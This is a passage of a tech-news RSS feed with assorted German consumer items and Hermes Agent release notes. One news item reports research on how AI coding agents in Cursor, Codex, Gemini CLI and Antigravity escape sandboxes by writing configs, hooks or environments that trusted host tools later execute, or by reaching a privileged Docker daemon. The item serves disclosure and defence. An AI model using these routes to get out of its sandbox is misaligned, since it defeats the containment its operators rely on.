<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">1.</span>
<h3 class="wp-block-heading"><strong>Wie lange sind Whatsapp-Fotos im Backup verfügbar?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Solange Ihr Google- oder iCloud-Speicher nicht voll ist. Wichtig: Seit Ende 2023 zählen Whatsapp-Backups auf Android zum regulären Google-One-Kontingent und sind nicht mehr kostenlos unbegrenzt.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">2.</span>
<h3 class="wp-block-heading"><strong>Kann ich einzelne Bilder aus dem Backup wiederherstellen, ohne alles zurückzusetzen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Nein. Whatsapp stellt immer das gesamte Backup wieder her, nicht einzelne Dateien.<br></p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">3.</span>
<h3 class="wp-block-heading"><strong>Funktioniert die Dateisystem-Methode auch auf dem iPhone?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Nein. iOS erlaubt keinen direkten Dateizugriff auf Whatsapp-Ordner von außen.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">4.</span>
<h3 class="wp-block-heading"><strong>Was tun, wenn kein Backup vorhanden ist?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Prüfen Sie zuerst die Galerie und das Dateisystem (Android). Ist das Bild dort ebenfalls nicht mehr vorhanden, sind die Chancen auf Wiederherstellung leider sehr gering.</p>
</div>
</div></div>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Soundcore Space 2: Anker legt Transporttasche kostenlos dazu]]></title>
<description><![CDATA[Anker hat im Frühjahr mit dem Soundcore Space 2 eine verbesserte Version seines großen Over-Ear-Kopfhörers in den Handel gebracht. Aktuell fährt der Hersteller bei Amazon eine Sonderaktion für das Gerät. So wurde der Preis für den Kopfhörer auf 109 Euro gesenkt und obendrauf bekommt man eine pass...]]></description>
<link>https://tsecurity.de/de/3683747/ios-mac-os/soundcore-space-2-anker-legt-transporttasche-kostenlos-dazu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683747/ios-mac-os/soundcore-space-2-anker-legt-transporttasche-kostenlos-dazu/</guid>
<pubDate>Tue, 21 Jul 2026 14:56:13 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/soundcore-space-2-anker-legt-transporttasche-kostenlos-dazu-284177/"><img align="right" hspace="5" width="150" src="https://images.iphone-ticker.de/wp-content/uploads/2026/06/soundcore-space-2-1-700x528.jpg" class="alignright wp-post-image tfe" alt="Soundcore Space 2 1" title=""></a><p>Anker hat im Frühjahr mit dem Soundcore Space 2 eine verbesserte Version seines großen Over-Ear-Kopfhörers in den Handel gebracht. Aktuell fährt der Hersteller bei Amazon eine Sonderaktion für das Gerät. So wurde der Preis für den Kopfhörer auf 109 Euro gesenkt und obendrauf bekommt man eine passende stoßfeste Transporttasche kostenlos dazu. Dafür müssen lediglich beide […]</p>
<p>The post <a href="https://www.ifun.de/soundcore-space-2-anker-legt-transporttasche-kostenlos-dazu-284177/">Soundcore Space 2: Anker legt Transporttasche kostenlos dazu</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents can escape sandboxes without ever breaking them]]></title>
<description><![CDATA[Sandboxes have become a key security control for AI coding agents, but new research suggests they may not provide the isolation many organizations assume. 



Pillar Security has disclosed a series of vulnerabilities showing how agents in tools such as Cursor, Codex, Gemini CLI, and Antigravity c...]]></description>
<link>https://tsecurity.de/de/3683594/it-security-nachrichten/ai-agents-can-escape-sandboxes-without-ever-breaking-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683594/it-security-nachrichten/ai-agents-can-escape-sandboxes-without-ever-breaking-them/</guid>
<pubDate>Tue, 21 Jul 2026 13:53:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Sandboxes have become a key security control for AI coding agents, but new research suggests they may not provide the isolation many organizations assume. </p>



<p class="wp-block-paragraph">Pillar Security has disclosed a series of vulnerabilities showing how agents in tools such as Cursor, Codex, Gemini CLI, and Antigravity can indirectly cross security boundaries without technically escaping their sandboxes.</p>



<p class="wp-block-paragraph">“In almost every case, the agent did not need to break the sandbox directly,” the researchers said in a blog post. “It only had to write something that a trusted component outside the sandbox would later run, load, scan, or treat as safe.”</p>



<p class="wp-block-paragraph">The findings outlined four specific and repeatable failure modes in AI sandboxes. These included denylist sandboxes failing growing OS complexity, workspace configurations turning out to be executable code, command allowlists trusting command names instead of invocations, and privileged local daemons that sit outside the sandbox entirely.</p>



<p class="wp-block-paragraph">“CISOs and security buyers need to realize that it’s not enough for an agentic IDE or CLI to have a sandbox,” the researchers said, adding that it is important to know where the sandbox’s actual boundary is.</p>



<h2 class="wp-block-heading">Escaping sandboxes without breaking them</h2>



<p class="wp-block-paragraph">Pillar challenged the basic understanding of sandboxing in AI-assisted development. Rather than escaping through kernel exploits or container breakouts, the demonstrated attacks relied on an indirect mechanism.</p>



<p class="wp-block-paragraph">In all shown attack paths, the agent remains confined while producing files that trusted host-side applications subsequently consume.</p>



<p class="wp-block-paragraph">Those files may include workspace configuration, automation scripts, IDE settings, and virtual environment contents that naturally participate in a developer’s workflow. When external tools later execute or interpret those files outside the sandbox, code originating from within the isolated environment effectively crosses the security boundary without violating the sandbox’s rules.</p>



<h2 class="wp-block-heading">Different sandbox escapes for different agents</h2>



<p class="wp-block-paragraph">Pillar demonstrated the pattern across multiple AI coding tools using different techniques. In Antigravity, the researchers <a href="https://www.pillar.security/blog/escaping-antigravitys-allow-default-seatbelt" target="_blank" rel="noreferrer noopener">exploited</a> weaknesses in the denylist-style macOS Seabelt profile and abused VS Code task configurations that were later executed outside the sandbox. Cursor, meanwhile, was shown to trust agent-created <a href="https://www.pillar.security/blog/the-sandbox-let-me-edit-a-venv-and-something-else-ran-it" target="_blank" rel="noreferrer noopener">Python virtual environments</a>, alternate <a href="https://www.pillar.security/blog/git-directories-do-not-have-to-be-called-git" target="_blank" rel="noreferrer noopener">Git directories</a>, and workspace <a href="https://www.pillar.security/blog/the-hook-was-already-in-the-workspace" target="_blank" rel="noreferrer noopener">hook configurations </a>that ultimately ran with host privileges.</p>



<p class="wp-block-paragraph">The researchers also found a <a href="https://www.pillar.security/blog/one-docker-socket-to-rule-them-all-escaping-codex-cursor-and-gemini-clis-sandboxes" target="_blank" rel="noreferrer noopener">common escape path</a> affecting Cursor, Codex CLI, and Gemini CLI through Docker Desktop’s privileged daemon, allowing sandboxed agents to execute commands outside their restricted environments.</p>



<p class="wp-block-paragraph">In another Codex CLI finding, a supposedly safe Git allowlist could be manipulated to modify repository configuration and trigger code execution at a later stage.</p>



<h2 class="wp-block-heading">Agentic development demands a different security model</h2>



<p class="wp-block-paragraph">Pilar argued that enterprises need a new security model for agentic software. The existing endpoint protections typically focus on whether a process can escape its execution environment. But autonomous agents challenge this by continuously generating content that other trusted systems consume.</p>



<p class="wp-block-paragraph">The researchers recommended treating workspace configurations that can trigger execution as sensitive assets, requiring explicit approval before agents create or modify host-side automation, ensuring that helper processes operate under the same security policy as direct agent execution, and preserving provenance that distinguishes user-created files from repository- or agent-generated content. </p>



<p class="wp-block-paragraph">Organizations were also advised to model security policies around command side effects rather than simply process invocation, limit access to privileged local services, and monitor trust handoffs throughout the development workflow.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft streicht praktische Outlook-Funktion: Ersatz kostet extra]]></title>
<description><![CDATA[Was bisher kostenlos war, gibt es schon bald nur noch gegen Aufpreis.]]></description>
<link>https://tsecurity.de/de/3683535/it-nachrichten/microsoft-streicht-praktische-outlook-funktion-ersatz-kostet-extra/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683535/it-nachrichten/microsoft-streicht-praktische-outlook-funktion-ersatz-kostet-extra/</guid>
<pubDate>Tue, 21 Jul 2026 13:33:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Was bisher kostenlos war, gibt es schon bald nur noch gegen Aufpreis.]]></content:encoded>
</item>
<item>
<title><![CDATA[Gratis bei Amazon: 16 Kindle-E-Books mit Gefühl, Schrecken und praktischen Tipps]]></title>
<description><![CDATA[Diese 16 Kindle-E-Books bei Amazon sind kostenlos und bringen neben  spannender Unterhaltung auch frischen Wind in Küche und Haushalt.]]></description>
<link>https://tsecurity.de/de/3683187/it-nachrichten/gratis-bei-amazon-16-kindle-e-books-mit-gefuehl-schrecken-und-praktischen-tipps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683187/it-nachrichten/gratis-bei-amazon-16-kindle-e-books-mit-gefuehl-schrecken-und-praktischen-tipps/</guid>
<pubDate>Tue, 21 Jul 2026 11:33:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Diese 16 Kindle-E-Books bei Amazon sind kostenlos und bringen neben  spannender Unterhaltung auch frischen Wind in Küche und Haushalt.]]></content:encoded>
</item>
<item>
<title><![CDATA[Betrifft Handys von Samsung und Xiaomi: Google-Update sorgt für weniger Speicher]]></title>
<description><![CDATA[Wer ein Android-Handy von Samsung, Xiaomi oder einem anderen Hersteller nutzt, hat bald weniger Cloudspeicher zur Verfügung. Google aktualisiert seine Backup-Richtlinien.
																					Dieser Artikel wurde einsortiert unter 
																	Download,																	Android,														...]]></description>
<link>https://tsecurity.de/de/3682920/it-nachrichten/betrifft-handys-von-samsung-und-xiaomi-google-update-sorgt-fuer-weniger-speicher/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682920/it-nachrichten/betrifft-handys-von-samsung-und-xiaomi-google-update-sorgt-fuer-weniger-speicher/</guid>
<pubDate>Tue, 21 Jul 2026 09:32:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wer ein Android-Handy von Samsung, Xiaomi oder einem anderen Hersteller nutzt, hat bald weniger Cloudspeicher zur Verfügung. Google aktualisiert seine Backup-Richtlinien.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/download/index.html">Download</a>,																	<a href="https://www.netzwelt.de/download/8900-android-kostenlos.html">Android</a>,																	<a href="https://www.netzwelt.de/update-fahrplan/samsung-galaxy-android-updates-ueberblick-0211.html">Samsung: So lange erhält euer Galaxy-Handy Updates</a>,																	<a href="https://www.netzwelt.de/update-fahrplan/xiaomi-android-updates-smartphones-tablets-ueberblick.html">Xiaomi: So lange erhalten Mi, Redmi und Poco-Handys Android-Updates</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sydney Sweeneys Hype-Thriller siegt in den internationalen Charts: So seht ihr die Bestseller-Verfilmung kostenlos im Stream]]></title>
<description><![CDATA[Sydney Sweeneys Hype-Thriller aus 2025 ist jetzt in den internationalen Streaming-Charts. Wie ihr die Bestseller-Verfilmung jetzt auch im Heimkino schauen könnt, gibt es hier.
																					Dieser Artikel wurde einsortiert unter 
																	VPN,																	Amazon Prime Video,			...]]></description>
<link>https://tsecurity.de/de/3682000/it-nachrichten/sydney-sweeneys-hype-thriller-siegt-in-den-internationalen-charts-so-seht-ihr-die-bestseller-verfilmung-kostenlos-im-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682000/it-nachrichten/sydney-sweeneys-hype-thriller-siegt-in-den-internationalen-charts-so-seht-ihr-die-bestseller-verfilmung-kostenlos-im-stream/</guid>
<pubDate>Mon, 20 Jul 2026 21:03:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sydney Sweeneys Hype-Thriller aus 2025 ist jetzt in den internationalen Streaming-Charts. Wie ihr die Bestseller-Verfilmung jetzt auch im Heimkino schauen könnt, gibt es hier.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/vpn/">VPN</a>,																	<a href="https://www.netzwelt.de/amazon-prime-video/index.html">Amazon Prime Video</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/amazon-prime-video/neue-filme-serien-kosten-neuheiten-starts/index.html">Neu bei Amazon Prime Video: Diese Film- und Serienhighlights erwarten euch im Juli 2026</a>,																	<a href="https://www.netzwelt.de/serien/euphoria/">Euphoria: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/filme/">Filme</a>,																	<a href="https://www.netzwelt.de/amazon-prime-video/index.html">Amazon Prime Video</a>,																	<a href="https://www.netzwelt.de/video/streaming-tipps-heute-netflix-prime-streamen-solltest/index.html">Streaming-Tipps heute: Was du bei Netflix &amp; Prime streamen solltest</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.19.0 (2026.7.20) — The Quicksilver Release]]></title>
<description><![CDATA[Hermes Agent v0.19.0 (v2026.7.20)
Release Date: July 20, 2026
Since v0.18.0: ~2,245 commits · ~1,065 merged PRs · ~2,465 files changed · ~300,000 insertions · ~36,000 deletions · ~3,300 issues closed · 450+ community contributors

The Quicksilver Release. Hermes is the messenger god, and this win...]]></description>
<link>https://tsecurity.de/de/3681964/downloads/hermes-agent-v0190-2026720-the-quicksilver-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681964/downloads/hermes-agent-v0190-2026720-the-quicksilver-release/</guid>
<pubDate>Mon, 20 Jul 2026 20:46:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.19.0 (v2026.7.20)</h1>
<p><strong>Release Date:</strong> July 20, 2026<br>
<strong>Since v0.18.0:</strong> ~2,245 commits · ~1,065 merged PRs · ~2,465 files changed · ~300,000 insertions · ~36,000 deletions · <strong>~3,300 issues closed</strong> · <strong>450+ community contributors</strong></p>
<blockquote>
<p><strong>The Quicksilver Release.</strong> Hermes is the messenger god, and this window we made him move like it. First-turn time-to-first-token dropped <strong>~80% on every platform</strong>, reasoning streams live by default, the desktop app got a ~20-PR speed overhaul (14× faster streaming markdown, virtualized diffs, snappy session switching), and the TUI renders markdown incrementally. Around that speed spine: you can now <strong>manage your Nous subscription without leaving the terminal</strong>, plug <strong>Bitwarden and 1Password</strong> straight into Hermes, let <strong>smart approvals</strong> judge flagged commands for you by default, <strong>watch your subagents work live</strong>, and trust that a finished response <strong>survives a gateway crash</strong> thanks to a durable delivery ledger. This release also rolls up everything from the v0.18.1 and v0.18.2 infrastructure patch tags — those windows are fully documented here.</p>
</blockquote>
<hr>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Hermes got dramatically faster — first token in a fraction of the time</strong> — Cold-start "Initializing agent..." used to eat ~4.3 seconds before your first turn even reached the model; it's now ~0.9s, an ~80% cut that applies to the CLI, gateway, TUI, desktop, and cron alike. Round 2 attacked what you <em>see</em> while waiting: reasoning models now stream their thinking live by default (no more staring at a spinner for 30 seconds), and the response box paints per token instead of per line. If Hermes ever felt like it took a deep breath before answering, that breath is gone. (<a href="https://github.com/NousResearch/hermes-agent/pull/59332" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59332/hovercard">#59332</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59389/hovercard">#59389</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>The desktop app speed wave — 20+ targeted perf PRs</strong> — Long replies used to cost 14× more CPU in the markdown splitter than they do now; giant diffs froze the review pane until we virtualized it; switching sessions thrashes layout no more. Streaming no longer re-renders the sidebar and every tool row per token, profile backends pre-warm on hover intent, and boot-hidden panes mount at idle instead of on the cold-start critical path. The net effect: the desktop app feels like a native app under load, even with huge transcripts and busy agents. (<a href="https://github.com/NousResearch/hermes-agent/pull/67154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67154/hovercard">#67154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67818/hovercard">#67818</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65898" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65898/hovercard">#65898</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66033/hovercard">#66033</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66747/hovercard">#66747</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67742" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67742/hovercard">#67742</a> and more — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Manage your Nous plan from the terminal — <code>/subscription</code> and <code>/topup</code></strong> — Changing your subscription used to mean a trip to the billing website. Now <code>/subscription</code> opens a full flow right in the TUI or classic CLI: see your plan and remaining allowance, preview exactly what an upgrade costs ("Pay $46.30 &amp; upgrade now") or when a downgrade takes effect, and apply it — with scheduled-change banners and undo. The desktop app got a matching billing settings tab. Your wallet never has to leave the keyboard. (<a href="https://github.com/NousResearch/hermes-agent/pull/51639" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51639/hovercard">#51639</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61054" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61054/hovercard">#61054</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61067" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61067/hovercard">#61067</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>)</p>
</li>
<li>
<p><strong>Smart approvals are now the default</strong> — When Hermes wants to run a flagged command, an LLM reviewer now assesses it independently instead of asking you to approve every single one — and each verdict covers only that exact command, so a later command matching the same pattern gets its own review. Combined with the new <strong>user-defined deny rules</strong> (which block commands even under yolo mode) and <code>/deny &lt;reason&gt;</code> (which tells the agent <em>why</em> you refused so it course-corrects), day-to-day approval fatigue drops sharply without giving up control. (<a href="https://github.com/NousResearch/hermes-agent/pull/62661" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62661/hovercard">#62661</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59164" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59164/hovercard">#59164</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54518" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54518/hovercard">#54518</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Plug your password manager into Hermes — Bitwarden &amp; 1Password secret sources</strong> — API keys no longer have to live in a plaintext <code>.env</code>. A new pluggable <code>SecretSource</code> interface lets Hermes fetch secrets from Bitwarden and 1Password (<code>op://</code> references) at load time, with multiple vaults enabled simultaneously, deterministic precedence, conflict warnings, and per-variable provenance. This consolidated eleven competing community PRs into one orchestrated interface — future vault providers drop in as plugins. (<a href="https://github.com/NousResearch/hermes-agent/pull/59498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59498/hovercard">#59498</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, 1Password provider salvaged from <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a>)</p>
</li>
<li>
<p><strong>Watch your subagents work — live transcripts + durable background delegation</strong> — <code>delegate_task</code> dispatches now return live transcript files you can <code>tail -f</code> the moment the subagents launch: every tool call, result, and streamed reply, one human-readable log per child. And background delegation completions are now <strong>durable</strong> — if the process restarts mid-run, results are restored and delivered through an ownership-checked ledger instead of vanishing. Fan out a fleet, watch any worker live, and never lose the results. (<a href="https://github.com/NousResearch/hermes-agent/pull/67479" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67479/hovercard">#67479</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63494/hovercard">#63494</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>A finished answer can no longer be lost — the delivery-obligation ledger</strong> — If the gateway died between generating your response and confirming the platform actually delivered it, that answer used to be silently gone (and you'd paid for the turn). Final responses are now recorded in a durable ledger in <code>state.db</code> around the platform send and <strong>redelivered on the next boot</strong> — closing a P1 silent-loss window for Telegram, Discord, Slack, and every other channel. (<a href="https://github.com/NousResearch/hermes-agent/pull/67181" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67181/hovercard">#67181</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>One gateway, many profiles — profile-based message routing</strong> — A single multiplexed gateway sharing one bot token can now route specific guilds, channels, or threads to different profiles — each with fully isolated config, skills, memory, and secrets. Point your work Discord server at the <code>work</code> profile and your hobby server at <code>personal</code>, from one bot. A second multiplex hardening wave means one misconfigured profile can no longer take down the whole gateway. (<a href="https://github.com/NousResearch/hermes-agent/pull/64835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64835/hovercard">#64835</a> salvaging <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Burgunthy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Burgunthy">@Burgunthy</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65700" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65700/hovercard">#65700</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60589" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60589/hovercard">#60589</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a> + six salvaged contributors)</p>
</li>
<li>
<p><strong>New providers and the newest frontier models</strong> — Fireworks AI and DeepInfra land as first-class providers (Fireworks with cost estimation and a <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3370551446" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2">#2</a> slot in the provider picker), Upstage Solar joins via salvage, and the model catalogs picked up <strong>GPT-5.6 (Sol/Terra/Luna + Pro variants, wired end-to-end across every route)</strong>, <strong>grok-4.5 (GA)</strong>, <strong>moonshotai/kimi-k3</strong>, <strong>claude-fable-5 / claude-sonnet-5</strong>, and GA <strong>tencent/hy3</strong> — plus LM Studio JIT model loading for local setups. (<a href="https://github.com/NousResearch/hermes-agent/pull/62593" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62593/hovercard">#62593</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63969/hovercard">#63969</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61616" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61616/hovercard">#61616</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a> completing <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>'s <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4848372503" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/61578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61578/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/61578">#61578</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60887" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60887/hovercard">#60887</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65913" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65913/hovercard">#65913</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64541/hovercard">#64541</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65472" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65472/hovercard">#65472</a>)</p>
</li>
<li>
<p><strong>Crank the thinking to max — new reasoning effort tiers and per-model control</strong> — Reasoning effort gained <code>max</code> and <code>ultra</code> levels (GPT-5.6 and Codex's top tiers), selectable everywhere from the CLI to the desktop, with sane clamping on providers with smaller scales. You can now also pin <strong>per-model reasoning-effort overrides</strong> in config, set <strong>per-slot effort in MoA presets</strong> (your advisors think hard, your synthesizer stays fast), and per-task effort for auxiliary models. Thinking depth is now a dial, not a global switch. (<a href="https://github.com/NousResearch/hermes-agent/pull/62650" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62650/hovercard">#62650</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64458" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64458/hovercard">#64458</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64631/hovercard">#64631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64597" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64597/hovercard">#64597</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Your sessions, your data — export everything</strong> — <code>hermes sessions export</code> now writes Markdown, Quarto, HTML, prompt-only, and even Hugging Face-ready trace formats, with the full filter surface (age, workspace, platform), an opt-in <code>--redact</code> secret-scrubbing pass, and compacted-session lineage stitched into one logical export. Pair with the new prune filters and bulk archive to keep your session store tidy. Your conversation history is a real dataset now, not a black box. (<a href="https://github.com/NousResearch/hermes-agent/pull/60186" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60186/hovercard">#60186</a> salvaging <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60492" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60492/hovercard">#60492</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60507/hovercard">#60507</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59327" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59327/hovercard">#59327</a> — <a class="user-mention notranslate" 